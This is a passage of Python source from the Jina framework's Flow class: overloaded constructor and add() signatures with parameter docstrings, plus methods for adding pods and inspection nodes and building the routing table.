.. # noqa: DAR202
.. # noqa: DAR101
.. # noqa: DAR003
"""
# overload_inject_end_client_flow
# overload_inject_start_gateway_flow
@overload
def __init__(
self,
*,
compress: Optional[str] = 'NONE',
compress_min_bytes: Optional[int] = 1024,
compress_min_ratio: Optional[float] = 1.1,
cors: Optional[bool] = False,
ctrl_with_ipc: Optional[bool] = True,
daemon: Optional[bool] = False,
default_swagger_ui: Optional[bool] = False,
description: Optional[str] = None,
env: Optional[dict] = None,
expose_endpoints: Optional[str] = None,
expose_public: Optional[bool] = False,
host: Optional[str] = '0.0.0.0',
host_in: Optional[str] = '0.0.0.0',
host_out: Optional[str] = '0.0.0.0',
hosts_in_connect: Optional[List[str]] = None,
log_config: Optional[str] = None,
memory_hwm: Optional[int] = -1,
name: Optional[str] = 'gateway',
native: Optional[bool] = False,
no_crud_endpoints: Optional[bool] = False,
no_debug_endpoints: Optional[bool] = False,
on_error_strategy: Optional[str] = 'IGNORE',
port_ctrl: Optional[int] = None,
port_expose: Optional[int] = None,
port_in: Optional[int] = None,
port_out: Optional[int] = None,
prefetch: Optional[int] = 0,
protocol: Optional[str] = 'GRPC',
proxy: Optional[bool] = False,
py_modules: Optional[List[str]] = None,
quiet: Optional[bool] = False,
quiet_error: Optional[bool] = False,
replicas: Optional[int] = 1,
runs_in_docker: Optional[bool] = False,
runtime_backend: Optional[str] = 'PROCESS',
runtime_cls: Optional[str] = 'GRPCRuntime',
shards: Optional[int] = 1,
socket_in: Optional[str] = 'PULL_CONNECT',
socket_out: Optional[str] = 'PUSH_CONNECT',
ssh_keyfile: Optional[str] = None,
ssh_password: Optional[str] = None,
ssh_server: Optional[str] = None,
static_routing_table: Optional[bool] = False,
timeout_ctrl: Optional[int] = 5000,
timeout_ready: Optional[int] = 600000,
title: Optional[str] = None,
uses: Optional[Union[str, Type['BaseExecutor'], dict]] = 'BaseExecutor',
uses_metas: Optional[dict] = None,
uses_requests: Optional[dict] = None,
uses_with: Optional[dict] = None,
uvicorn_kwargs: Optional[dict] = None,
workspace: Optional[str] = None,
zmq_identity: Optional[str] = None,
**kwargs,
):
"""Create a Flow. Flow is how Jina streamlines and scales Executors. This overloaded method provides arguments from `jina gateway` CLI.
:param compress: The compress algorithm used over the entire Flow.
Note that this is not necessarily effective;
it depends on the settings of `--compress-min-bytes` and `--compress-min-ratio`
:param compress_min_bytes: The original message size must be larger than this number to trigger the compress algorithm, -1 means disable compression.
:param compress_min_ratio: The compression ratio (uncompressed_size/compressed_size) must be higher than this number to trigger the compress algorithm.
:param cors: If set, a CORS middleware is added to FastAPI frontend to allow cross-origin access.
:param ctrl_with_ipc: If set, use ipc protocol for control socket
:param daemon: The Pea attempts to terminate all of its Runtime child processes/threads on exiting. Setting it to true basically tells the Pea not to wait on the Runtime when closing
:param default_swagger_ui: If set, the default swagger ui is used for `/docs` endpoint.
:param description: The description of this HTTP server. It will be used in automatics docs such as Swagger UI.
:param env: The map of environment variables that are available inside runtime
:param expose_endpoints: A JSON string that represents a map from executor endpoints (`@requests(on=...)`) to HTTP endpoints.
:param expose_public: If set, expose the public IP address to remote when necessary, by default it exposes the private IP address, which only allows access within the same network/subnet. It is important to set this to true when the Pea will receive input connections from remote Peas
:param host: The host address of the runtime, by default it is 0.0.0.0.
:param host_in: The host address for input, by default it is 0.0.0.0
:param host_out: The host address for output, by default it is 0.0.0.0
:param hosts_in_connect: The host address for input, by default it is 0.0.0.0
:param log_config: The YAML config of the logger used in this object.
:param memory_hwm: The memory high watermark of this pod in Gigabytes, pod will restart when this is reached. -1 means no restriction
:param name: The name of this object.
This will be used in the following places:
- how you refer to this object in Python/YAML/CLI
- visualization
- log message header
- ...
When not given, then the default naming strategy will apply.
:param native: If set, only native Executors are allowed, and the Executor is always run inside ZEDRuntime.
:param no_crud_endpoints: If set, /index, /search, /update, /delete endpoints are removed from HTTP interface.
Any executor that has `@requests(on=...)` bind with those values will receive data requests.
:param no_debug_endpoints: If set, /status /post endpoints are removed from HTTP interface.
:param on_error_strategy: The skip strategy on exceptions.
- IGNORE: Ignore it, keep running all Executors in the sequel flow
- SKIP_HANDLE: Skip all Executors in the sequel, only `pre_hook` and `post_hook` are called
- THROW_EARLY: Immediately throw the exception, the sequel flow will not be running at all
Note, `IGNORE`, `SKIP_EXECUTOR` and `SKIP_HANDLE` do not guarantee the success execution in the sequel flow. If something
is wrong in the upstream, it is hard to carry this exception and moving forward without any side-effect.
:param port_ctrl: The port for controlling the runtime, default a random port between [49152, 65535]
:param port_expose: The port that the gateway exposes for clients for GRPC connections.
:param port_in: The port for input data, default a random port between [49152, 65535]
:param port_out: The port for output data, default a random port between [49152, 65535]
:param prefetch: Number of requests fetched from the client before feeding into the first Executor.
Used to control the speed of data input into a Flow. 0 disables prefetch (disabled by default)
:param protocol: Communication protocol between server and client.
:param proxy: If set, respect the http_proxy and https_proxy environment variables. Otherwise, these proxy variables are unset before start; gRPC seems to prefer no proxy
:param py_modules: The customized python modules need to be imported before loading the executor
Note that the recommended way is to only import a single module - a simple python file, if your
executor can be defined in a single file, or an ``__init__.py`` file if you have multiple files,
which should be structured as a python package. For more details, please see the
`Executor cookbook <https://docs.jina.ai/fundamentals/executor/repository-structure/>`__
:param quiet: If set, then no log will be emitted from this object.
:param quiet_error: If set, then exception stack information will not be added to the log
:param replicas: The number of replicas in the pod, `port_in` and `port_out` will be set to random, and routers will be added automatically when necessary
:param runs_in_docker: Informs a Pea that runs in a container. Important to properly set networking information
:param runtime_backend: The parallel backend of the runtime inside the Pea
:param runtime_cls: The runtime class to run inside the Pea
:param shards: The number of shards in the pod running at the same time, `port_in` and `port_out` will be set to random, and routers will be added automatically when necessary
:param socket_in: The socket type for input port
:param socket_out: The socket type for output port
:param ssh_keyfile: This specifies a key to be used in ssh login, default None. regular default ssh keys will be used without specifying this argument.
:param ssh_password: The ssh password to the ssh server.
:param ssh_server: The SSH server through which the tunnel will be created, can actually be a fully specified `user@server:port` ssh url.
:param static_routing_table: Defines if the routing table should be pre-computed by the Flow. In this case it is statically defined for each Pod and not sent on every data request. It cannot be used in combination with external pods
:param timeout_ctrl: The timeout in milliseconds of the control request, -1 for waiting forever
:param timeout_ready: The timeout in milliseconds of a Pea waits for the runtime to be ready, -1 for waiting forever
:param title: The title of this HTTP server. It will be used in automatics docs such as Swagger UI.
:param uses: The config of the executor, it could be one of the followings:
* an Executor YAML file (.yml, .yaml, .jaml)
* a Jina Hub Executor (must start with `jinahub://` or `jinahub+docker://`)
* a docker image (must start with `docker://`)
* the string literal of a YAML config (must start with `!` or `jtype: `)
* the string literal of a JSON config
When used in Python, the following values are additionally supported:
- a Python dict that represents the config
- a text file stream that has a `.read()` interface
:param uses_metas: Dictionary of keyword arguments that will override the `metas` configuration in `uses`
:param uses_requests: Dictionary of keyword arguments that will override the `requests` configuration in `uses`
:param uses_with: Dictionary of keyword arguments that will override the `with` configuration in `uses`
:param uvicorn_kwargs: Dictionary of kwargs arguments that will be passed to Uvicorn server when starting the server
More details can be found in Uvicorn docs: https://www.uvicorn.org/settings/
:param workspace: The working directory for any IO operations in this object. If not set, then derive from its parent `workspace`.
:param zmq_identity: The identity of a ZMQRuntime. It is used for unique socket identification towards other ZMQRuntimes.
.. # noqa: DAR202
.. # noqa: DAR101
.. # noqa: DAR003
"""
# overload_inject_end_gateway_flow
# overload_inject_start_flow
@overload
def __init__(
self,
*,
env: Optional[dict] = None,
inspect: Optional[str] = 'COLLECT',
log_config: Optional[str] = None,
name: Optional[str] = None,
quiet: Optional[bool] = False,
quiet_error: Optional[bool] = False,
static_routing_table: Optional[bool] = False,
uses: Optional[str] = None,
workspace: Optional[str] = './',
**kwargs,
):
"""Create a Flow. Flow is how Jina streamlines and scales Executors. This overloaded method provides arguments from `jina flow` CLI.
:param env: The map of environment variables that are available inside runtime
:param inspect: The strategy on those inspect pods in the flow.
If `REMOVE` is given then all inspect pods are removed when building the flow.
:param log_config: The YAML config of the logger used in this object.
:param name: The name of this object.
This will be used in the following places:
- how you refer to this object in Python/YAML/CLI
- visualization
- log message header
- ...
When not given, then the default naming strategy will apply.
:param quiet: If set, then no log will be emitted from this object.
:param quiet_error: If set, then exception stack information will not be added to the log
:param static_routing_table: Defines if the routing table should be pre-computed by the Flow. In this case it is statically defined for each Pod and not sent on every data request. It cannot be used in combination with external pods
:param uses: The YAML file represents a flow
:param workspace: The working directory for any IO operations in this object. If not set, then derive from its parent `workspace`.
.. # noqa: DAR202
.. # noqa: DAR101
.. # noqa: DAR003
"""
# overload_inject_end_flow
def __init__(
self,
args: Optional['argparse.Namespace'] = None,
**kwargs,
):
super().__init__()
self._version = '1' #: YAML version number, this will be later overridden if YAML config says the other way
self._pod_nodes = OrderedDict() # type: Dict[str, Pod]
self._inspect_pods = {} # type: Dict[str, str]
self._endpoints_mapping = {} # type: Dict[str, Dict]
self._build_level = FlowBuildLevel.EMPTY
self._last_changed_pod = [
GATEWAY_NAME
] #: default first pod is gateway, will add when build()
self._update_args(args, **kwargs)
self.k8s_infrastructure_manager = None
if self.args.infrastructure == InfrastructureType.K8S:
self.k8s_infrastructure_manager = self._FlowK8sInfraResourcesManager(
k8s_namespace=self.args.name,
k8s_custom_resource_dir=getattr(
self.args, 'k8s_custom_resource_dir', None
),
)
if isinstance(self.args, argparse.Namespace):
self.logger = JinaLogger(
self.__class__.__name__, **vars(self.args), **self._common_kwargs
)
else:
self.logger = JinaLogger(self.__class__.__name__, **self._common_kwargs)
def _update_args(self, args, **kwargs):
from ..parsers.flow import set_flow_parser
from ..helper import ArgNamespace
_flow_parser = set_flow_parser()
if args is None:
args = ArgNamespace.kwargs2namespace(
kwargs, _flow_parser, True, fallback_parsers=FALLBACK_PARSERS
)
self.args = args
# common args should be the ones that can not be parsed by _flow_parser
known_keys = vars(args)
self._common_kwargs = {k: v for k, v in kwargs.items() if k not in known_keys}
self._kwargs = ArgNamespace.get_non_defaults_args(
args, _flow_parser
) #: for yaml dump
if self._common_kwargs.get('asyncio', False) and not isinstance(
self, AsyncPostMixin
):
from .asyncio import AsyncFlow
self.__class__ = AsyncFlow
@staticmethod
def _parse_endpoints(op_flow, pod_name, endpoint, connect_to_last_pod=False) -> Set:
# parsing needs
if isinstance(endpoint, str):
endpoint = [endpoint]
elif not endpoint:
if op_flow._last_changed_pod and connect_to_last_pod:
endpoint = [op_flow.last_pod]
else:
endpoint = []
if isinstance(endpoint, (list, tuple)):
for idx, s in enumerate(endpoint):
if s == pod_name:
raise FlowTopologyError(
'the input/output of a pod can not be itself'
)
else:
raise ValueError(f'endpoint={endpoint} is not parsable')
# if an endpoint is being inspected, then replace it with inspected Pod
endpoint = set(op_flow._inspect_pods.get(ep, ep) for ep in endpoint)
return endpoint
@property
def last_pod(self):
"""Last pod
.. # noqa: DAR401
.. # noqa: DAR201
"""
return self._last_changed_pod[-1]
@last_pod.setter
def last_pod(self, name: str):
"""
Set a Pod as the last Pod in the Flow, useful when modifying the Flow.
.. # noqa: DAR401
:param name: the name of the existing Pod
"""
if name not in self._pod_nodes:
raise FlowMissingPodError(f'{name} can not be found in this Flow')
if self._last_changed_pod and name == self.last_pod:
pass
else:
self._last_changed_pod.append(name)
# graph is now changed so we need to
# reset the build level to the lowest
self._build_level = FlowBuildLevel.EMPTY
@allowed_levels([FlowBuildLevel.EMPTY])
def _add_gateway(self, needs, **kwargs):
kwargs.update(
dict(
name=GATEWAY_NAME,
ctrl_with_ipc=True, # otherwise ctrl port would be conflicted
host=self.host,
protocol=self.protocol,
port_expose=self.port_expose,
pod_role=PodRoleType.GATEWAY,
expose_endpoints=json.dumps(self._endpoints_mapping),
k8s_namespace=self.args.name,
)
)
kwargs.update(self._common_kwargs)
args = ArgNamespace.kwargs2namespace(kwargs, set_gateway_parser())
args.k8s_namespace = self.args.name
args.connect_to_predecessor = False
args.noblock_on_start = True
self._pod_nodes[GATEWAY_NAME] = PodFactory.build_pod(
args, needs, self.args.infrastructure
)
@allowed_levels([FlowBuildLevel.EMPTY])
def needs(
self, needs: Union[Tuple[str], List[str]], name: str = 'joiner', *args, **kwargs
) -> 'Flow':
"""
Add a blocker to the Flow, wait until all peas defined in **needs** have completed.
.. # noqa: DAR401
:param needs: list of service names to wait
:param name: the name of this joiner, by default is ``joiner``
:param args: additional positional arguments forwarded to the add function
:param kwargs: additional key value arguments forwarded to the add function
:return: the modified Flow
"""
if len(needs) <= 1:
raise FlowTopologyError(
'no need to wait for a single service, need len(needs) > 1'
)
return self.add(
name=name, needs=needs, pod_role=PodRoleType.JOIN, *args, **kwargs
)
def needs_all(self, name: str = 'joiner', *args, **kwargs) -> 'Flow':
"""
Collect all hanging Pods so far and add a blocker to the Flow; wait until all hanging Peas have completed.
:param name: the name of this joiner (default is ``joiner``)
:param args: additional positional arguments which are forwarded to the add and needs function
:param kwargs: additional key value arguments which are forwarded to the add and needs function
:return: the modified Flow
"""
needs = _hanging_pods(self)
if len(needs) == 1:
return self.add(name=name, needs=needs, *args, **kwargs)
return self.needs(name=name, needs=needs, *args, **kwargs)
# overload_inject_start_pod
@overload
def add(
self,
*,
connect_to_predecessor: Optional[bool] = False,
ctrl_with_ipc: Optional[bool] = False,
daemon: Optional[bool] = False,
docker_kwargs: Optional[dict] = None,
entrypoint: Optional[str] = None,
env: Optional[dict] = None,
expose_public: Optional[bool] = False,
external: Optional[bool] = False,
force: Optional[bool] = False,
gpus: Optional[str] = None,
host: Optional[str] = '0.0.0.0',
host_in: Optional[str] = '0.0.0.0',
host_out: Optional[str] = '0.0.0.0',
hosts_in_connect: Optional[List[str]] = None,
install_requirements: Optional[bool] = False,
log_config: Optional[str] = None,
memory_hwm: Optional[int] = -1,
name: Optional[str] = None,
native: Optional[bool] = False,
on_error_strategy: Optional[str] = 'IGNORE',
peas_hosts: Optional[List[str]] = None,
polling: Optional[str] = 'ANY',
port_ctrl: Optional[int] = None,
port_in: Optional[int] = None,
port_jinad: Optional[int] = 8000,
port_out: Optional[int] = None,
pull_latest: Optional[bool] = False,
py_modules: Optional[List[str]] = None,
quiet: Optional[bool] = False,
quiet_error: Optional[bool] = False,
quiet_remote_logs: Optional[bool] = False,
replicas: Optional[int] = 1,
runs_in_docker: Optional[bool] = False,
runtime_backend: Optional[str] = 'PROCESS',
runtime_cls: Optional[str] = 'ZEDRuntime',
scheduling: Optional[str] = 'LOAD_BALANCE',
shards: Optional[int] = 1,
socket_in: Optional[str] = 'PULL_BIND',
socket_out: Optional[str] = 'PUSH_BIND',
ssh_keyfile: Optional[str] = None,
ssh_password: Optional[str] = None,
ssh_server: Optional[str] = None,
static_routing_table: Optional[bool] = False,
timeout_ctrl: Optional[int] = 5000,
timeout_ready: Optional[int] = 600000,
upload_files: Optional[List[str]] = None,
uses: Optional[Union[str, Type['BaseExecutor'], dict]] = 'BaseExecutor',
uses_after: Optional[Union[str, Type['BaseExecutor'], dict]] = None,
uses_before: Optional[Union[str, Type['BaseExecutor'], dict]] = None,
uses_metas: Optional[dict] = None,
uses_requests: Optional[dict] = None,
uses_with: Optional[dict] = None,
volumes: Optional[List[str]] = None,
workspace: Optional[str] = None,
zmq_identity: Optional[str] = None,
**kwargs,
) -> Union['Flow', 'AsyncFlow']:
"""Add an Executor to the current Flow object.
:param connect_to_predecessor: The head Pea of this Pod will connect to the TailPea of the predecessor Pod.
:param ctrl_with_ipc: If set, use ipc protocol for control socket
:param daemon: The Pea attempts to terminate all of its Runtime child processes/threads on exiting. Setting it to true basically tells the Pea not to wait on the Runtime when closing
:param docker_kwargs: Dictionary of kwargs arguments that will be passed to Docker SDK when starting the docker '
container.
More details can be found in the Docker SDK docs: https://docker-py.readthedocs.io/en/stable/
:param entrypoint: The entrypoint command overrides the ENTRYPOINT in the Docker image. When not set, the Docker image ENTRYPOINT takes effect.
:param env: The map of environment variables that are available inside runtime
:param expose_public: If set, expose the public IP address to remote when necessary, by default it exposes the private IP address, which only allows access within the same network/subnet. It is important to set this to true when the Pea will receive input connections from remote Peas
:param external: The Pod will be considered an external Pod that has been started independently from the Flow. This Pod will not be context-managed by the Flow.
:param force: If set, always pull the latest Hub Executor bundle even it exists on local
:param gpus: This argument allows dockerized Jina executor discover local gpu devices.
Note,
- To access all gpus, use `--gpus all`.
- To access multiple gpus, e.g. make use of 2 gpus, use `--gpus 2`.
- To access specified gpus based on device id, use `--gpus device=[YOUR-GPU-DEVICE-ID]`
- To access specified gpus based on multiple device id, use `--gpus device=[YOUR-GPU-DEVICE-ID1],device=[YOUR-GPU-DEVICE-ID2]`
- To specify more parameters, use `--gpus device=[YOUR-GPU-DEVICE-ID],runtime=nvidia,capabilities=display`
:param host: The host address of the runtime, by default it is 0.0.0.0.
:param host_in: The host address for input, by default it is 0.0.0.0
:param host_out: The host address for output, by default it is 0.0.0.0
:param hosts_in_connect: The host address for input, by default it is 0.0.0.0
:param install_requirements: If set, install `requirements.txt` in the Hub Executor bundle to local
:param log_config: The YAML config of the logger used in this object.
:param memory_hwm: The memory high watermark of this pod in Gigabytes, pod will restart when this is reached. -1 means no restriction
:param name: The name of this object.
This will be used in the following places:
- how you refer to this object in Python/YAML/CLI
- visualization
- log message header
- ...
When not given, then the default naming strategy will apply.
:param native: If set, only native Executors are allowed, and the Executor is always run inside ZEDRuntime.
:param on_error_strategy: The skip strategy on exceptions.
- IGNORE: Ignore it, keep running all Executors in the sequel flow
- SKIP_HANDLE: Skip all Executors in the sequel, only `pre_hook` and `post_hook` are called
- THROW_EARLY: Immediately throw the exception, the sequel flow will not be running at all
Note, `IGNORE`, `SKIP_EXECUTOR` and `SKIP_HANDLE` do not guarantee the success execution in the sequel flow. If something
is wrong in the upstream, it is hard to carry this exception and moving forward without any side-effect.
:param peas_hosts: The hosts of the peas when shards greater than 1.
Peas will be evenly distributed among the hosts. By default,
peas are running on host provided by the argument ``host``
:param polling: The polling strategy of the Pod (when `shards>1`)
- ANY: only one (whoever is idle) Pea polls the message
- ALL: all Peas poll the message (like a broadcast)
:param port_ctrl: The port for controlling the runtime, default a random port between [49152, 65535]
:param port_in: The port for input data, default a random port between [49152, 65535]
:param port_jinad: The port of the remote machine for usage with JinaD.
:param port_out: The port for output data, default a random port between [49152, 65535]
:param pull_latest: Pull the latest image before running
:param py_modules: The customized python modules need to be imported before loading the executor
Note that the recommended way is to only import a single module - a simple python file, if your
executor can be defined in a single file, or an ``__init__.py`` file if you have multiple files,
which should be structured as a python package. For more details, please see the
`Executor cookbook <https://docs.jina.ai/fundamentals/executor/repository-structure/>`__
:param quiet: If set, then no log will be emitted from this object.
:param quiet_error: If set, then exception stack information will not be added to the log
:param quiet_remote_logs: Do not display the streaming of remote logs on local console
:param replicas: The number of replicas in the pod, `port_in` and `port_out` will be set to random, and routers will be added automatically when necessary
:param runs_in_docker: Informs a Pea that runs in a container. Important to properly set networking information
:param runtime_backend: The parallel backend of the runtime inside the Pea
:param runtime_cls: The runtime class to run inside the Pea
:param scheduling: The strategy of scheduling workload among Peas
:param shards: The number of shards in the pod running at the same time, `port_in` and `port_out` will be set to random, and routers will be added automatically when necessary
:param socket_in: The socket type for input port
:param socket_out: The socket type for output port
:param ssh_keyfile: This specifies a key to be used in ssh login, default None. regular default ssh keys will be used without specifying this argument.
:param ssh_password: The ssh password to the ssh server.
:param ssh_server: The SSH server through which the tunnel will be created, can actually be a fully specified `user@server:port` ssh url.
:param static_routing_table: Defines if the routing table should be pre-computed by the Flow. In this case it is statically defined for each Pod and not sent on every data request. It cannot be used in combination with external pods
:param timeout_ctrl: The timeout in milliseconds of the control request, -1 for waiting forever
:param timeout_ready: The timeout in milliseconds of a Pea waits for the runtime to be ready, -1 for waiting forever
:param upload_files: The files on the host to be uploaded to the remote
workspace. This can be useful when your Pod has more
file dependencies beyond a single YAML file, e.g.
Python files, data files.
Note,
- currently only a flat structure is supported, which means if you upload `[./foo/a.py, ./foo/b.py, ./bar/c.yml]`, then they will be put under the _same_ workspace on the remote, losing all hierarchies.
- by default, `--uses` YAML file is always uploaded.
- uploaded files are by default isolated across the runs. To ensure files are submitted to the same workspace across different runs, use `--workspace-id` to specify the workspace.
:param uses: The config of the executor, it could be one of the followings:
* an Executor YAML file (.yml, .yaml, .jaml)
* a Jina Hub Executor (must start with `jinahub://` or `jinahub+docker://`)
* a docker image (must start with `docker://`)
* the string literal of a YAML config (must start with `!` or `jtype: `)
* the string literal of a JSON config
When used in Python, the following values are additionally supported:
- a Python dict that represents the config
- a text file stream that has a `.read()` interface
:param uses_after: The executor attached after the Peas described by --uses, typically used for receiving from all shards, accepted type follows `--uses`
:param uses_before: The executor attached before the Peas described by --uses, typically used before sending to all shards, accepted type follows `--uses`
:param uses_metas: Dictionary of keyword arguments that will override the `metas` configuration in `uses`
:param uses_requests: Dictionary of keyword arguments that will override the `requests` configuration in `uses`
:param uses_with: Dictionary of keyword arguments that will override the `with` configuration in `uses`
:param volumes: The path on the host to be mounted inside the container.
Note,
- If separated by `:`, then the first part will be considered as the local host path and the second part is the path in the container system.
- If no split provided, then the basename of that directory will be mounted into container's root path, e.g. `--volumes="/user/test/my-workspace"` will be mounted into `/my-workspace` inside the container.
- All volumes are mounted with read-write mode.
:param workspace: The working directory for any IO operations in this object. If not set, then derive from its parent `workspace`.
:param zmq_identity: The identity of a ZMQRuntime. It is used for unique socket identification towards other ZMQRuntimes.
:return: a (new) Flow object with modification
.. # noqa: DAR202
.. # noqa: DAR101
.. # noqa: DAR003
"""
# overload_inject_end_pod
@allowed_levels([FlowBuildLevel.EMPTY])
def add(
self,
*,
needs: Optional[Union[str, Tuple[str], List[str]]] = None,
copy_flow: bool = True,
pod_role: 'PodRoleType' = PodRoleType.POD,
**kwargs,
) -> 'Flow':
"""
Add a Pod to the current Flow object and return the new modified Flow object.
The attribute of the Pod can be later changed with :py:meth:`set` or deleted with :py:meth:`remove`
.. # noqa: DAR401
:param needs: the name of the Pod(s) that this Pod receives data from.
One can also use 'gateway' to indicate the connection with the gateway.
:param pod_role: the role of the Pod, used for visualization and route planning
:param copy_flow: when set to true, always copy the current Flow, apply the modification on the copy and return it; otherwise, modify in place
:param kwargs: other keyword-value arguments that the Pod CLI supports
:return: a (new) Flow object with modification
"""
op_flow = copy.deepcopy(self) if copy_flow else self
# pod naming logic
pod_name = kwargs.get('name', None)
if pod_name in op_flow._pod_nodes:
new_name = f'{pod_name}{len(op_flow._pod_nodes)}'
self.logger.debug(
f'"{pod_name}" is used in this Flow already! renamed it to "{new_name}"'
)
pod_name = new_name
if not pod_name:
pod_name = f'executor{len(op_flow._pod_nodes)}'
if not pod_name.isidentifier():
# hyphen - can not be used in the name
raise ValueError(
f'name: {pod_name} is invalid, please follow the python variable name conventions'
)
# needs logic
needs = op_flow._parse_endpoints(
op_flow, pod_name, needs, connect_to_last_pod=True
)
# set the kwargs inherit from `Flow(kwargs1=..., kwargs2=)`
for key, value in op_flow._common_kwargs.items():
if key not in kwargs:
kwargs[key] = value
# check if host is set to remote:port
if 'host' in kwargs:
m = re.match(_regex_port, kwargs['host'])
if (
kwargs.get('host', __default_host__) != __default_host__
and m
and 'port_jinad' not in kwargs
):
kwargs['port_jinad'] = m.group(2)
kwargs['host'] = m.group(1)
# update kwargs of this Pod
kwargs.update(dict(name=pod_name, pod_role=pod_role, num_part=len(needs)))
parser = set_pod_parser()
if pod_role == PodRoleType.GATEWAY:
parser = set_gateway_parser()
args = ArgNamespace.kwargs2namespace(
kwargs, parser, True, fallback_parsers=FALLBACK_PARSERS
)
# grpc data runtime does not support sharding at the moment
if (
args.grpc_data_requests
and kwargs.get('shards') is not None
and kwargs.get('shards', 1) > 1
and self.args.infrastructure != InfrastructureType.K8S
):
raise NotImplementedError("GRPC data runtime does not support sharding")
if args.grpc_data_requests and args.runtime_cls == 'ZEDRuntime':
args.runtime_cls = 'GRPCDataRuntime'
# pod workspace if not set then derive from flow workspace
args.workspace = os.path.abspath(args.workspace or self.workspace)
args.k8s_namespace = self.args.name
args.noblock_on_start = True
# BACKWARDS COMPATIBILITY:
# We assume that this is used in a search Flow if replicas and shards are used
# Thus the polling type should be all
# But don't override any user-provided polling
if args.replicas > 1 and args.shards > 1 and 'polling' not in kwargs:
args.polling = PollingType.ALL
op_flow._pod_nodes[pod_name] = PodFactory.build_pod(
args, needs, self.args.infrastructure
)
op_flow.last_pod = pod_name
return op_flow
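# Editor's sketch (illustrative; executor names are placeholders): .add()
# returns a modified copy of the Flow, so Pods are typically chained:
#
#     f = (Flow()
#          .add(name='encoder', uses='MyEncoder')
#          .add(name='indexer', needs='encoder'))
#     with f:
#         ...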
@allowed_levels([FlowBuildLevel.EMPTY])
def inspect(self, name: str = 'inspect', *args, **kwargs) -> 'Flow':
"""Add an inspection on the last changed Pod in the Flow
Internally, it adds two Pods to the Flow. But don't worry, the overhead is minimized and you
can remove them by simply using `Flow(inspect=FlowInspectType.REMOVE)` before using the Flow.
.. highlight:: bash
.. code-block:: bash
Flow -- PUB-SUB -- BasePod(_pass) -- Flow
|
-- PUB-SUB -- InspectPod (Hanging)
In this way, :class:`InspectPod` looks like a simple ``_pass`` from outside and
does not introduce side-effects (e.g. changing the socket type) to the original Flow.
The original incoming and outgoing socket types are preserved.
This function is very handy for introducing an Evaluator into the Flow.
.. seealso::
:meth:`gather_inspect`
:param name: name of the Pod
:param args: args for .add()
:param kwargs: kwargs for .add()
:return: the new instance of the Flow
"""
_last_pod = self.last_pod
op_flow = self.add(
name=name, needs=_last_pod, pod_role=PodRoleType.INSPECT, *args, **kwargs
)
# now remove uses and add an auxiliary Pod
if 'uses' in kwargs:
kwargs.pop('uses')
op_flow = op_flow.add(
name=f'_aux_{name}',
needs=_last_pod,
pod_role=PodRoleType.INSPECT_AUX_PASS,
*args,
**kwargs,
)
# register any future connection to _last_pod by the auxiliary Pod
op_flow._inspect_pods[_last_pod] = op_flow.last_pod
return op_flow
@allowed_levels([FlowBuildLevel.EMPTY])
def gather_inspect(
self,
name: str = 'gather_inspect',
include_last_pod: bool = True,
*args,
**kwargs,
) -> 'Flow':
"""Gather all inspect Pods output into one Pod. When the Flow has no inspect Pod then the Flow itself
is returned.
.. note::
If ``--no-inspect`` is **not** given, then :meth:`gather_inspect` is auto called before :meth:`build`. So
in general you don't need to manually call :meth:`gather_inspect`.
:param name: the name of the gather Pod
:param include_last_pod: if to include the last modified Pod in the Flow
:param args: args for .add()
:param kwargs: kwargs for .add()
:return: the modified Flow or the copy of it
.. seealso::
:meth:`inspect`
"""
needs = [k for k, v in self._pod_nodes.items() if v.role == PodRoleType.INSPECT]
if needs:
if include_last_pod:
needs.append(self.last_pod)
return self.add(
name=name,
needs=needs,
pod_role=PodRoleType.JOIN_INSPECT,
*args,
**kwargs,
)
else:
# no inspect node is in the graph, return the current graph
return self
def _get_gateway_target(self, prefix):
gateway_pod = self._pod_nodes[GATEWAY_NAME]
return (
f'{prefix}-{GATEWAY_NAME}',
{
'host': gateway_pod.head_host,
'port': gateway_pod.head_port_in,
'expected_parts': 0,
},
)
# TODO needs to be refactored - deployment should not be a dictionary. Related Ticket:
# https://github.com/jina-ai/jina/issues/3280
def _get_routing_table(self) -> RoutingTable:
graph = RoutingTable()
for pod_id, pod in self._pod_nodes.items():
if pod_id == GATEWAY_NAME:
deployment = pod.deployments[0]
graph.add_pod(
f'start-{GATEWAY_NAME}',
deployment['head_host'],
deployment['head_port_in'],
deployment['tail_port_out'],
deployment['head_zmq_identity'],
)
graph.add_pod(
f'end-{GATEWAY_NAME}',
deployment['head_host'],
deployment['head_port_in'],
deployment['tail_port_out'],
deployment['head_zmq_identity'],
)
else:
for deployment in pod.deployments:
graph.add_pod(
deployment['name'],
deployment['head_host'],
deployment['head_port_in'],
deployment['tail_port_out'],
deployment['head_zmq_identity'],
)
for end, pod in self._pod_nodes.items():
if end == GATEWAY_NAME:
end = f'end-{GATEWAY_NAME}'
if pod.head_args.hosts_in_connect is None:
pod.head_args.hosts_in_connect = []
if isinstance(pod, K8sPod):
from ..peapods.pods.k8slib import kubernetes_deployment
end = kubernetes_deployment.to_dns_name(end)
if end not in graph.pods:
end = end + '_head'
if isinstance(pod, K8sPod):
from ..peapods.pods.k8slib import kubernetes_deployment
end = kubernetes_deployment.to_dns_name(end)
for start in pod.needs:
start_pod = self._pod_nodes[start]
if start == GATEWAY_NAME:
start = f'start-{GATEWAY_NAME}'
if isinstance(start_pod, K8sPod):
from ..peapods.pods.k8slib import kubernetes_deployment
start = kubernetes_deployment.to_dns_name(start)
if start not in graph.pods:
start = start + '_tail'
if isinstance(start_pod, K8sPod):
from ..peapods.pods.k8slib import kubernetes_deployment
start = kubernetes_deployment.to_dns_name(start)
start_pod = graph._get_target_pod(start)
if pod.connect_to_predecessor or is_remote_local_connection(
start_pod.host, pod.head_host
):
pod.head_args.hosts_in_connect.append(
graph._get_target_pod(start).full_out_address
)
graph.add_edge(start, end, True)
else:
graph.add_edge(start, end)
# In case of sharding, the head and the tail pea have to be connected to the shards
for end, pod in self._pod_nodes.items():
if len(pod.deployments) > 0:
deployments = pod.deployments
for deployment in deployments[1:-1]:
graph.add_edge(deployments[0]['name'], deployment['name'])
graph.add_edge(deployment['name'], deployments[-1]['name'])
graph.active_pod = f'start-{GATEWAY_NAME}'
return graph
def _set_initial_dynamic_routing_table(self):
routing_table = self._get_routing_table()
if not routing_table.is_acyclic():
raise RoutingTableCyclicError(
'The routing graph has a cycle. This would result in an infinite loop. Fix your Flow setup.'
)
for pod in self._pod_nodes:
routing_table_copy = RoutingTable()
routing_table_copy.proto.CopyFrom(routing_table.proto)
self._pod_nodes[
pod
].args.static_routing_table = self.args.static_routing_table
# The gateway always needs the routing table to be set
if pod == GATEWAY_NAME:
self._pod_nodes[pod].args.routing_table = routing_table_copy.json()
# For other pods we only set it if we are told do so
